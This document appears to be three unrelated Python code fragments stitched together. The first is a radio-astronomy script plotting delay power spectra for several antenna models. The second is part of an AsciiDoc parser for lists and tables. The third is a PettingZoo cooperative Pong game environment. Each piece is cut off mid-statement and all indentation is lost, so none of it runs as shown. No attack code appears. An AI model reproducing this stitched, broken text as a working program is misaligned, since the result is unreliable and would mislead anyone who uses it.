delta_array_usm_cc_skyvis_lag = DSP.downsampler(delta_array_usm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
delta_array_usm_dspec_max = NP.abs(delta_array_usm_cc_skyvis_lag).max()
delta_array_usm_dspec_min = NP.abs(delta_array_usm_cc_skyvis_lag).min()
# delta_array_usm_dspec_max = delta_array_usm_dspec_max**2 * volfactor1 * volfactor2 * Jy2K**2
# delta_array_usm_dspec_min = delta_array_usm_dspec_min**2 * volfactor1 * volfactor2 * Jy2K**2
if max_abs_delay is not None:
delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag[:,small_delays_ind,:]
fig, axs = PLT.subplots(n_snaps, sharex=True, sharey=True, figsize=(6,6))
for j in xrange(n_snaps):
imdspec = axs[j].pcolorfast(truncated_ref_bl_length, 1e6*clean_lags, NP.abs(delta_array_usm_cc_skyvis_lag[:-1,:-1,j].T)**2 * volfactor1 * volfactor2 * Jy2K**2, norm=PLTC.LogNorm(vmin=(1e5**2) * volfactor1 * volfactor2 * Jy2K**2, vmax=(delta_array_usm_dspec_max**2) * volfactor1 * volfactor2 * Jy2K**2))
horizonb = axs[j].plot(truncated_ref_bl_length, 1e6*min_delay.ravel(), color='white', ls=':', lw=1.5)
horizont = axs[j].plot(truncated_ref_bl_length, 1e6*max_delay.ravel(), color='white', ls=':', lw=1.5)
axs[j].set_ylim(0.9*NP.amin(clean_lags*1e6), 0.9*NP.amax(clean_lags*1e6))
axs[j].set_aspect('auto')
axs[j].text(0.5, 0.9, descriptor_str[j], transform=axs[j].transAxes, fontsize=14, weight='semibold', ha='center', color='white')
for j in xrange(n_snaps):
axs_kprll = axs[j].twinx()
axs_kprll.set_yticks(kprll(axs[j].get_yticks()*1e-6, redshift))
axs_kprll.set_ylim(kprll(NP.asarray(axs[j].get_ylim())*1e-6, redshift))
yformatter = FuncFormatter(lambda y, pos: '{0:.2f}'.format(y))
axs_kprll.yaxis.set_major_formatter(yformatter)
if j == 0:
axs_kperp = axs[j].twiny()
axs_kperp.set_xticks(kperp(axs[j].get_xticks()*freq/FCNST.c, redshift))
axs_kperp.set_xlim(kperp(NP.asarray(axs[j].get_xlim())*freq/FCNST.c, redshift))
xformatter = FuncFormatter(lambda x, pos: '{0:.3f}'.format(x))
axs_kperp.xaxis.set_major_formatter(xformatter)
fig.subplots_adjust(hspace=0)
big_ax = fig.add_subplot(111)
big_ax.set_axis_bgcolor('none')
big_ax.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
big_ax.set_xticks([])
big_ax.set_yticks([])
big_ax.set_ylabel(r'$\tau$ [$\mu$s]', fontsize=16, weight='medium', labelpad=30)
big_ax.set_xlabel(r'$|\mathbf{b}|$ [m]', fontsize=16, weight='medium', labelpad=20)
big_axr = big_ax.twinx()
big_axr.set_axis_bgcolor('none')
big_axr.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
big_axr.set_xticks([])
big_axr.set_yticks([])
big_axr.set_ylabel(r'$k_\parallel$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium', labelpad=40)
big_axt = big_ax.twiny()
big_axt.set_axis_bgcolor('none')
big_axt.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
big_axt.set_xticks([])
big_axt.set_yticks([])
big_axt.set_xlabel(r'$k_\perp$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium', labelpad=30)
cbax = fig.add_axes([0.9, 0.125, 0.02, 0.74])
cbar = fig.colorbar(imdspec, cax=cbax, orientation='vertical')
cbax.set_xlabel(r'K$^2$(Mpc/h)$^3$', labelpad=10, fontsize=12)
cbax.xaxis.set_label_position('top')
# PLT.tight_layout()
fig.subplots_adjust(right=0.72)
fig.subplots_adjust(top=0.88)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/delta_array_multi_baseline_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_usm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'_no_pfb_{0:.1f}'.format(oversampling_factor)+'.png', bbox_inches=0)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/delta_array_multi_baseline_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_usm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'_no_pfb_{0:.1f}'.format(oversampling_factor)+'.eps', bbox_inches=0)
##################################################################
if plot_18:
# 18) Plot delay spectra of the all-sky model with dipole, MWA tile, and HERA dish antenna shapes
mwa_dipole_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = mwa_dipole_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
mwa_dipole_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = mwa_dipole_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
mwa_dipole_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(mwa_dipole_asm_cc_skyvis, axis=1),axes=1) * mwa_dipole_asm_cc_skyvis.shape[1] * freq_resolution
mwa_dipole_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(mwa_dipole_asm_cc_skyvis_res, axis=1),axes=1) * mwa_dipole_asm_cc_skyvis.shape[1] * freq_resolution
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag + mwa_dipole_asm_ccres_sky
mwa_dipole_asm_cc_skyvis_lag = DSP.downsampler(mwa_dipole_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
delta_array_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = delta_array_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = delta_array_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(delta_array_asm_cc_skyvis, axis=1),axes=1) * delta_array_asm_cc_skyvis.shape[1] * freq_resolution
delta_array_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(delta_array_asm_cc_skyvis_res, axis=1),axes=1) * delta_array_asm_cc_skyvis.shape[1] * freq_resolution
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag + delta_array_asm_ccres_sky
delta_array_asm_cc_skyvis_lag = DSP.downsampler(delta_array_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
hera_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = hera_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
hera_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = hera_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
hera_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(hera_asm_cc_skyvis, axis=1),axes=1) * hera_asm_cc_skyvis.shape[1] * freq_resolution
hera_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(hera_asm_cc_skyvis_res, axis=1),axes=1) * hera_asm_cc_skyvis.shape[1] * freq_resolution
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag + hera_asm_ccres_sky
hera_asm_cc_skyvis_lag = DSP.downsampler(hera_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
if max_abs_delay is not None:
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag[:,small_delays_ind,:]
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag[:,small_delays_ind,:]
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag[:,small_delays_ind,:]
antelem_asm_dspec_max = max([NP.abs(mwa_dipole_asm_cc_skyvis_lag).max(), NP.abs(delta_array_asm_cc_skyvis_lag).max(), NP.abs(hera_asm_cc_skyvis_lag).max()])
antelem_asm_dspec_min = min([NP.abs(mwa_dipole_asm_cc_skyvis_lag).min(), NP.abs(delta_array_asm_cc_skyvis_lag).min(), NP.abs(hera_asm_cc_skyvis_lag).min()])
# antelem_asm_dspec_max = antelem_asm_dspec_max**2 * volfactor1 * volfactor2 * Jy2K**2
# antelem_asm_dspec_min = antelem_asm_dspec_min**2 * volfactor1 * volfactor2 * Jy2K**2
delta_array_roifile = '/data3/t_nithyanandan/'+project_dir+'/roi_info_delta_array_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz'.format(Tsys, | |
is self:
reader.read() # Discard (already parsed item first line).
writer.write_tag(self.tag.term, [self.label],
self.presubs, self.attributes,trace='list term')
if self.text: break
writer.write(labeltag[1],trace='list label close')
# Write item text.
self.translate_item()
writer.write(entrytag[1],trace='list entry close')
def translate_item(self):
if self.type == 'callout':
self.attributes['coids'] = calloutmap.calloutids(self.ordinal)
itemtag = subs_tag(self.tag.item, self.attributes)
writer.write(itemtag[0],trace='list item open')
# Write ItemText.
text = reader.read_until(lists.terminators)
if self.text:
text = [self.text] + list(text)
if text:
writer.write_tag(self.tag.text, text, self.presubs, self.attributes,trace='list text')
# Process explicit and implicit list item continuations.
while True:
continuation = reader.read_next() == '+'
if continuation: reader.read() # Discard continuation line.
while Lex.next() in (BlockTitle,AttributeList):
# Consume continued element title and attributes.
Lex.next().translate()
if not continuation and BlockTitle.title:
# Titled elements terminate the list.
break
next = Lex.next()
if next in lists.open:
break
elif isinstance(next,List):
next.translate()
elif isinstance(next,Paragraph) and 'listelement' in next.options:
next.translate()
elif continuation:
# This is where continued elements are processed.
if next is Title:
message.error('section title not allowed in list item',halt=True)
next.translate()
else:
break
writer.write(itemtag[1],trace='list item close')
@staticmethod
def calc_style(index):
"""Return the numbered list style ('arabic'...) of the list item index.
Return None if unrecognized style."""
if re.match(r'^\d+[\.>]$', index):
style = 'arabic'
elif re.match(r'^[ivx]+\)$', index):
style = 'lowerroman'
elif re.match(r'^[IVX]+\)$', index):
style = 'upperroman'
elif re.match(r'^[a-z]\.$', index):
style = 'loweralpha'
elif re.match(r'^[A-Z]\.$', index):
style = 'upperalpha'
else:
assert False
return style
@staticmethod
def calc_index(index,style):
"""Return the ordinal number of (1...) of the list item index
for the given list style."""
def roman_to_int(roman):
roman = roman.lower()
digits = {'i':1,'v':5,'x':10}
result = 0
for i in range(len(roman)):
digit = digits[roman[i]]
# If next digit is larger this digit is negative.
if i+1 < len(roman) and digits[roman[i+1]] > digit:
result -= digit
else:
result += digit
return result
index = index[:-1]
if style == 'arabic':
ordinal = int(index)
elif style == 'lowerroman':
ordinal = roman_to_int(index)
elif style == 'upperroman':
ordinal = roman_to_int(index)
elif style == 'loweralpha':
ordinal = ord(index) - ord('a') + 1
elif style == 'upperalpha':
ordinal = ord(index) - ord('A') + 1
else:
assert False
return ordinal
def check_index(self):
"""Check calculated self.ordinal (1,2,...) against the item number
in the document (self.index) and check the number style is the same as
the first item (self.number_style)."""
assert self.type in ('numbered','callout')
if self.index:
style = self.calc_style(self.index)
if style != self.number_style:
message.warning('list item style: expected %s got %s' %
(self.number_style,style), offset=1)
ordinal = self.calc_index(self.index,style)
if ordinal != self.ordinal:
message.warning('list item index: expected %s got %s' %
(self.ordinal,ordinal), offset=1)
def check_tags(self):
""" Check that all necessary tags are present. """
tags = set(Lists.TAGS)
if self.type != 'labeled':
tags = tags.difference(['entry','label','term'])
missing = tags.difference(self.tag.keys())
if missing:
self.error('missing tag(s): %s' % ','.join(missing), halt=True)
def translate(self):
AbstractBlock.translate(self)
if self.short_name() in ('bibliography','glossary','qanda'):
message.deprecated('old %s list syntax' % self.short_name())
lists.open.append(self)
attrs = self.mo.groupdict().copy()
for k in ('label','text','index'):
if k in attrs: del attrs[k]
if self.index:
# Set the numbering style from first list item.
attrs['style'] = self.calc_style(self.index)
BlockTitle.consume(attrs)
AttributeList.consume(attrs)
self.merge_attributes(attrs,['tags'])
self.push_blockname()
if self.type in ('numbered','callout'):
self.number_style = self.attributes.get('style')
if self.number_style not in self.NUMBER_STYLES:
message.error('illegal numbered list style: %s' % self.number_style)
# Fall back to default style.
self.attributes['style'] = self.number_style = self.style
self.tag = lists.tags[self.parameters.tags]
self.check_tags()
if 'width' in self.attributes:
# Set horizontal list 'labelwidth' and 'itemwidth' attributes.
v = str(self.attributes['width'])
mo = re.match(r'^(\d{1,2})%?$',v)
if mo:
labelwidth = int(mo.group(1))
self.attributes['labelwidth'] = str(labelwidth)
self.attributes['itemwidth'] = str(100-labelwidth)
else:
self.error('illegal attribute value: width="%s"' % v)
stag,etag = subs_tag(self.tag.list, self.attributes)
if stag:
writer.write(stag,trace='list open')
self.ordinal = 0
# Process list till list syntax changes or there is a new title.
while Lex.next() is self and not BlockTitle.title:
self.ordinal += 1
document.attributes['listindex'] = str(self.ordinal)
if self.type in ('numbered','callout'):
self.check_index()
if self.type in ('bulleted','numbered','callout'):
reader.read() # Discard (already parsed item first line).
self.translate_item()
elif self.type == 'labeled':
self.translate_entry()
else:
raise AssertionError,'illegal [%s] list type' % self.defname
if etag:
writer.write(etag,trace='list close')
if self.type == 'callout':
calloutmap.validate(self.ordinal)
calloutmap.listclose()
lists.open.pop()
if len(lists.open):
document.attributes['listindex'] = str(lists.open[-1].ordinal)
self.pop_blockname()
class Lists(AbstractBlocks):
"""List of List objects."""
BLOCK_TYPE = List
PREFIX = 'listdef-'
TYPES = ('bulleted','numbered','labeled','callout')
TAGS = ('list', 'entry','item','text', 'label','term')
def __init__(self):
AbstractBlocks.__init__(self)
self.open = [] # A stack of the current and parent lists.
self.tags={} # List tags dictionary. Each entry is a tags AttrDict.
self.terminators=None # List of compiled re's.
def initialize(self):
self.terminators = [
re.compile(r'^\+$|^$'),
re.compile(AttributeList.pattern),
re.compile(lists.delimiters),
re.compile(blocks.delimiters),
re.compile(tables.delimiters),
re.compile(tables_OLD.delimiters),
]
def load(self,sections):
AbstractBlocks.load(self,sections)
self.load_tags(sections)
def load_tags(self,sections):
"""
Load listtags-* conf file sections to self.tags.
"""
for section in sections.keys():
mo = re.match(r'^listtags-(?P<name>\w+)$',section)
if mo:
name = mo.group('name')
if name in self.tags:
d = self.tags[name]
else:
d = AttrDict()
parse_entries(sections.get(section,()),d)
for k in d.keys():
if k not in self.TAGS:
message.warning('[%s] contains illegal list tag: %s' %
(section,k))
self.tags[name] = d
def validate(self):
AbstractBlocks.validate(self)
for b in self.blocks:
# Check list has valid type.
if not b.type in Lists.TYPES:
raise EAsciiDoc,'[%s] illegal type' % b.defname
b.validate()
def dump(self):
AbstractBlocks.dump(self)
for k,v in self.tags.items():
dump_section('listtags-'+k, v)
class DelimitedBlock(AbstractBlock):
def __init__(self):
AbstractBlock.__init__(self)
def load(self,name,entries):
AbstractBlock.load(self,name,entries)
def dump(self):
AbstractBlock.dump(self)
write = lambda s: sys.stdout.write('%s%s' % (s,writer.newline))
write('')
def isnext(self):
return AbstractBlock.isnext(self)
def translate(self):
AbstractBlock.translate(self)
reader.read() # Discard delimiter.
self.merge_attributes(AttributeList.attrs)
if not 'skip' in self.parameters.options:
BlockTitle.consume(self.attributes)
AttributeList.consume()
self.push_blockname()
options = self.parameters.options
if 'skip' in options:
reader.read_until(self.delimiter,same_file=True)
elif safe() and self.defname == 'blockdef-backend':
message.unsafe('Backend Block')
reader.read_until(self.delimiter,same_file=True)
else:
template = self.parameters.template
template = subs_attrs(template,self.attributes)
name = self.short_name()+' block'
if 'sectionbody' in options:
# The body is treated like a section body.
stag,etag = config.section2tags(template,self.attributes)
writer.write(stag,trace=name+' open')
Section.translate_body(self)
writer.write(etag,trace=name+' close')
else:
stag = config.section2tags(template,self.attributes,skipend=True)[0]
body = reader.read_until(self.delimiter,same_file=True)
presubs = self.parameters.presubs
postsubs = self.parameters.postsubs
body = Lex.subs(body,presubs)
if self.parameters.filter:
body = filter_lines(self.parameters.filter,body,self.attributes)
body = Lex.subs(body,postsubs)
# Write start tag, content, end tag.
etag = config.section2tags(template,self.attributes,skipstart=True)[1]
writer.write(dovetail_tags(stag,body,etag),trace=name)
trace(self.short_name()+' block close',etag)
if reader.eof():
self.error('missing closing delimiter',self.start)
else:
delimiter = reader.read() # Discard delimiter line.
assert re.match(self.delimiter,delimiter)
self.pop_blockname()
class DelimitedBlocks(AbstractBlocks):
"""List of delimited blocks."""
BLOCK_TYPE = DelimitedBlock
PREFIX = 'blockdef-'
def __init__(self):
AbstractBlocks.__init__(self)
def load(self,sections):
"""Update blocks defined in 'sections' dictionary."""
AbstractBlocks.load(self,sections)
def validate(self):
AbstractBlocks.validate(self)
class Column:
"""Table column."""
def __init__(self, width=None, align_spec=None, style=None):
self.width = width or '1'
self.halign, self.valign = Table.parse_align_spec(align_spec)
self.style = style # Style name or None.
# Calculated attribute values.
self.abswidth = None # 1.. (page units).
self.pcwidth = None # 1..99 (percentage).
class Cell:
def __init__(self, data, span_spec=None, align_spec=None, style=None):
self.data = data
self.span, self.vspan = Table.parse_span_spec(span_spec)
self.halign, self.valign = Table.parse_align_spec(align_spec)
self.style = style
self.reserved = False
def __repr__(self):
return '<Cell: %d.%d %s.%s %s "%s">' % (
self.span, self.vspan,
self.halign, self.valign,
self.style or '',
self.data)
def clone_reserve(self):
"""Return a clone of self to reserve vertically spanned cell."""
result = copy.copy(self)
result.vspan = 1
result.reserved = True
return result
class Table(AbstractBlock):
ALIGN = {'<':'left', '>':'right', '^':'center'}
VALIGN = {'<':'top', '>':'bottom', '^':'middle'}
FORMATS = ('psv','csv','dsv')
SEPARATORS = dict(
csv=',',
dsv=r':|\n',
# The count and align group matches are not exact.
psv=r'((?<!\S)((?P<span>[\d.]+)(?P<op>[*+]))?(?P<align>[<\^>.]{,3})?(?P<style>[a-z])?)?\|'
)
def __init__(self):
AbstractBlock.__init__(self)
self.CONF_ENTRIES += ('format','tags','separator')
# tabledef conf file parameters.
self.format='psv'
self.separator=None
self.tags=None # Name of tabletags-<tags> conf section.
# Calculated parameters.
self.abswidth=None # 1.. (page units).
self.pcwidth = None # 1..99 (percentage).
self.rows=[] # Parsed rows, each row is a list of Cells.
self.columns=[] # List of Columns.
@staticmethod
def parse_align_spec(align_spec):
"""
Parse AsciiDoc cell alignment specifier and return 2-tuple with
horizonatal and vertical alignment names. Unspecified alignments
set to None.
"""
result = (None, None)
if align_spec:
mo = re.match(r'^([<\^>])?(\.([<\^>]))?$', align_spec)
if mo:
result = (Table.ALIGN.get(mo.group(1)),
Table.VALIGN.get(mo.group(3)))
return result
@staticmethod
def parse_span_spec(span_spec):
"""
Parse AsciiDoc cell span specifier and return 2-tuple with horizonatal
and vertical span counts. Set default values (1,1) if not
specified.
"""
result = (None, None)
if span_spec:
mo = re.match(r'^(\d+)?(\.(\d+))?$', span_spec)
if mo:
result = (mo.group(1) and int(mo.group(1)),
mo.group(3) and int(mo.group(3)))
return (result[0] or 1, result[1] or 1)
def load(self,name,entries):
AbstractBlock.load(self,name,entries)
def dump(self):
AbstractBlock.dump(self)
write = lambda s: sys.stdout.write('%s%s' % (s,writer.newline))
write('format='+self.format)
write('')
def validate(self):
AbstractBlock.validate(self)
if self.format not in Table.FORMATS:
self.error('illegal format=%s' % self.format,halt=True)
self.tags = self.tags or 'default'
tags = [self.tags]
tags += [s['tags'] for s in self.styles.values() if 'tags' in s]
for t in tags:
| |
import os
import numpy as np
import gym
from gym.utils import seeding
from .cake_paddle import CakePaddle, RENDER_RATIO
from .manual_control import manual_control
from pettingzoo import AECEnv
from pettingzoo.utils import wrappers
from pettingzoo.utils.agent_selector import agent_selector
from pettingzoo.utils.to_parallel import parallel_wrapper_fn
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'
import pygame
from gym.utils import EzPickle
KERNEL_WINDOW_LENGTH = 1
def get_image(path):
image = pygame.image.load(path)
return image
def deg_to_rad(deg):
return deg * np.pi / 180
def get_flat_shape(width, height):
return int(width * height / (2 * KERNEL_WINDOW_LENGTH * KERNEL_WINDOW_LENGTH))
def original_obs_shape(screen_width, screen_height):
return (int(screen_height / KERNEL_WINDOW_LENGTH), int(screen_width / (2 * KERNEL_WINDOW_LENGTH)), 1)
def get_valid_angle(randomizer):
# generates an angle in [0, 2*np.pi) that \
# excludes (90 +- ver_deg_range), (270 +- ver_deg_range), (0 +- hor_deg_range), (180 +- hor_deg_range)
# (65, 115), (245, 295), (170, 190), (0, 10), (350, 360)
ver_deg_range = 25
hor_deg_range = 10
a1 = deg_to_rad(90 - ver_deg_range)
b1 = deg_to_rad(90 + ver_deg_range)
a2 = deg_to_rad(270 - ver_deg_range)
b2 = deg_to_rad(270 + ver_deg_range)
c1 = deg_to_rad(180 - hor_deg_range)
d1 = deg_to_rad(180 + hor_deg_range)
c2 = deg_to_rad(360 - hor_deg_range)
d2 = deg_to_rad(0 + hor_deg_range)
angle = 0
while ((angle > a1 and angle < b1) or (angle > a2 and angle < b2) or (angle > c1 and angle < d1) or (angle > c2) or (angle < d2)):
angle = 2 * np.pi * randomizer.rand()
return angle
def get_small_random_value(randomizer):
# generates a small random value between [0, 1/100)
return (1 / 100) * randomizer.rand()
class PaddleSprite(pygame.sprite.Sprite):
def __init__(self, dims, speed):
self.surf = pygame.Surface(dims)
self.rect = self.surf.get_rect()
self.speed = speed
def reset(self):
pass
def draw(self, screen):
pygame.draw.rect(screen, (255, 255, 255), self.rect)
def update(self, area, action):
# action: 1 - up, 2 - down
movepos = [0, 0]
if action > 0:
if action == 1:
movepos[1] = movepos[1] - self.speed
elif action == 2:
movepos[1] = movepos[1] + self.speed
# make sure the players stay inside the screen
newpos = self.rect.move(movepos)
if area.contains(newpos):
self.rect = newpos
def process_collision(self, b_rect, dx, dy, b_speed, paddle_type):
'''
Parameters
----------
b_rect : Ball rect
dx, dy : Ball speed along single axis
b_speed : Ball speed
Returns
-------
is_collision: 1 if ball collides with paddle
b_rect: new ball rect
b_speed: new ball speed
'''
if paddle_type == 1:
if self.rect.colliderect(b_rect):
is_collision = True
if dx < 0:
b_rect.left = self.rect.right
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif paddle_type == 2:
if self.rect.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
return False, b_rect, b_speed
class BallSprite(pygame.sprite.Sprite):
def __init__(self, randomizer, dims, speed, bounce_randomness=False): # def __init__(self, image, speed):
# self.surf = get_image(image)
self.surf = pygame.Surface(dims)
self.rect = self.surf.get_rect()
self.speed_val = speed
self.speed = [int(self.speed_val * np.cos(np.pi / 4)), int(self.speed_val * np.sin(np.pi / 4))]
self.bounce_randomness = bounce_randomness
self.done = False
self.hit = False
self.randomizer = randomizer
def update2(self, area, p0, p1):
(speed_x, speed_y) = self.speed
done_x, done_y = False, False
if self.speed[0] != 0:
done_x = self.move_single_axis(self.speed[0], 0, area, p0, p1)
if self.speed[1] != 0:
done_y = self.move_single_axis(0, self.speed[1], area, p0, p1)
return (done_x or done_y)
def move_single_axis(self, dx, dy, area, p0, p1):
# returns done
# move ball rect
self.rect.x += dx
self.rect.y += dy
if not area.contains(self.rect):
# bottom wall
if dy > 0:
self.rect.bottom = area.bottom
self.speed[1] = -self.speed[1]
# top wall
elif dy < 0:
self.rect.top = area.top
self.speed[1] = -self.speed[1]
# right or left walls
else:
return True
self.speed[0] = -self.speed[0]
else:
# Do ball and bat collide?
# add some randomness
r_val = 0
if self.bounce_randomness:
r_val = get_small_random_value(self.randomizer)
# ball in left half of screen
if self.rect.center[0] < area.center[0]:
is_collision, self.rect, self.speed = p0.process_collision(self.rect, dx, dy, self.speed, 1)
if is_collision:
self.speed = [self.speed[0] + np.sign(self.speed[0]) * r_val, self.speed[1] + np.sign(self.speed[1]) * r_val]
# ball in right half
else:
is_collision, self.rect, self.speed = p1.process_collision(self.rect, dx, dy, self.speed, 2)
if is_collision:
self.speed = [self.speed[0] + np.sign(self.speed[0]) * r_val, self.speed[1] + np.sign(self.speed[1]) * r_val]
return False
def draw(self, screen):
# screen.blit(self.surf, self.rect)
pygame.draw.rect(screen, (255, 255, 255), self.rect)
class CooperativePong(gym.Env):
metadata = {'render.modes': ['human', "rgb_array"]}
def __init__(self, randomizer, ball_speed=9, left_paddle_speed=12, right_paddle_speed=12, cake_paddle=True, max_cycles=900, bounce_randomness=False):
super(CooperativePong, self).__init__()
pygame.init()
self.num_agents = 2
# Display screen
self.s_width, self.s_height = 960 // RENDER_RATIO, 560 // RENDER_RATIO
self.screen = pygame.Surface((self.s_width, self.s_height)) # (960, 720) # (640, 480) # (100, 200)
self.area = self.screen.get_rect()
# define action and observation spaces
self.action_space = [gym.spaces.Discrete(3) for _ in range(self.num_agents)]
original_shape = original_obs_shape(self.s_width, self.s_height)
original_color_shape = (original_shape[0], original_shape[1], 3)
# self.observation_space = [gym.spaces.Box(low=0.0, high=1.0, shape=(original_shape), dtype=np.float32) for _ in range(self.num_agents)]
self.observation_space = [gym.spaces.Box(low=0, high=255, shape=(original_color_shape), dtype=np.uint8) for _ in range(self.num_agents)]
self.renderOn = False
# set speed
self.speed = [ball_speed, left_paddle_speed, right_paddle_speed]
self.max_cycles = max_cycles
# paddles
self.p0 = PaddleSprite((20 // RENDER_RATIO, 80 // RENDER_RATIO), left_paddle_speed)
if cake_paddle:
self.p1 = CakePaddle(right_paddle_speed)
else:
self.p1 = PaddleSprite((20 // RENDER_RATIO, 100 // RENDER_RATIO), right_paddle_speed)
self.agents = ["paddle_0", "paddle_1"] # list(range(self.num_agents))
# ball
self.ball = BallSprite(randomizer, (20 // RENDER_RATIO, 20 // RENDER_RATIO), ball_speed, bounce_randomness)
self.randomizer = randomizer
self.reinit()
def reinit(self):
self.rewards = dict(zip(self.agents, [0.0] * len(self.agents)))
self.dones = dict(zip(self.agents, [False] * len(self.agents)))
self.infos = dict(zip(self.agents, [{}] * len(self.agents)))
self.score = 0
def reset(self):
# does not return observations
# reset ball and paddle init conditions
self.ball.rect.center = self.area.center
# set the direction to an angle between [0, 2*np.pi)
angle = get_valid_angle(self.randomizer)
# angle = deg_to_rad(89)
self.ball.speed = [int(self.ball.speed_val * np.cos(angle)), int(self.ball.speed_val * np.sin(angle))]
self.p0.rect.midleft = self.area.midleft
self.p1.rect.midright = self.area.midright
self.p0.reset()
self.p1.reset()
self.p0.speed = self.speed[1]
self.p1.speed = self.speed[2]
self.done = False
self.num_frames = 0
self.reinit()
self.draw()
def close(self):
if self.renderOn:
pygame.event.pump()
pygame.display.quit()
self.renderOn = False
def enable_render(self):
self.screen = pygame.display.set_mode(self.screen.get_size())
self.renderOn = True
self.draw()
def render(self, mode='human'):
if not self.renderOn and mode == "human":
# sets self.renderOn to true and initializes display
self.enable_render()
observation = pygame.surfarray.pixels3d(self.screen)
pygame.display.flip()
return np.transpose(observation, axes=(1, 0, 2)) if mode == "rgb_array" else None
def observe(self, agent):
observation = pygame.surfarray.pixels3d(self.screen)
observation = np.rot90(observation, k=3) # now the obs is laid out as H, W as rows and cols
observation = np.fliplr(observation) # laid out in the correct order
if agent == self.agents[0]:
return observation[:, :int(observation.shape[1] / 2), :]
elif agent == self.agents[1]:
return observation[:, int(observation.shape[1] / 2):, :]
def draw(self):
# draw background
# pygame.display.get_surface().fill((0, 0, 0))
pygame.draw.rect(self.screen, (0, 0, 0), self.area)
# draw ball and paddles
self.p0.draw(self.screen)
self.p1.draw(self.screen)
self.ball.draw(self.screen)
def step(self, action, agent):
'''
Does not return anything
'''
# update p0, p1 accordingly
# action: 0: do nothing,
# action: 1: p[i] move up, 2: p[i] move down
if agent == self.agents[0]:
self.rewards = {a: 0 for a in self.agents}
self.p0.update(self.area, action)
elif agent == self.agents[1]:
self.p1.update(self.area, action)
# do the rest if not done
if not self.done:
# update ball position
self.done = self.ball.update2(self.area, self.p0, self.p1)
# do the miscellaneous stuff after the last agent has moved
# reward is the length of time ball is in play
reward = 0
# ball is out-of-bounds
if self.done:
reward = -100
self.score += reward
if not self.done:
self.num_frames += 1
# scaling reward so that the max reward is 100
reward = 100 / self.max_cycles
self.score += reward
if self.num_frames == self.max_cycles:
self.done = True
for ag in self.agents:
self.rewards[ag] = reward / self.num_agents
self.dones[ag] = self.done
self.infos[ag] = {}
if self.renderOn:
pygame.event.pump()
self.draw()
def env(**kwargs):
env = raw_env(**kwargs)
env = wrappers.AssertOutOfBoundsWrapper(env)
env = wrappers.NanNoOpWrapper(env, 0, "doing nothing")
